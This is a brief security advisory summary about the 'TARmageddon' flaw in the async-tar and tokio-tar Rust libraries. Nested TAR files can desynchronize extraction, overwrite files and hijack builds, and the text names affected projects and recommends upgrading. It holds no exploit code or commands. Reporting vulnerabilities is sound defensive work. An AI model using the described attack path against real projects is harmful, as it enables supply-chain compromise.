A critical vulnerability dubbed TARmageddon affects the async-tar and tokio-tar Rust libraries, allowing remote code execution through nested TAR files. Despite patches for active forks, the widespread use of unpatched versions poses a significant security risk across many projects. #CVE202562518 #tokio-tar
Keypoints
- The vulnerability arises from a desynchronization flaw during TAR file extraction.
- It can be exploited to overwrite files and hijack build processes in affected systems.
- The flaw impacts both abandoned and actively maintained forks, including tokio-tar, which has over 7 million downloads.
- Many projects, such as Binstalk and wasmCloud, are vulnerable due to dependencies on the affected libraries.
- Developers are advised to upgrade to patched forks or remove the vulnerable dependencies immediately.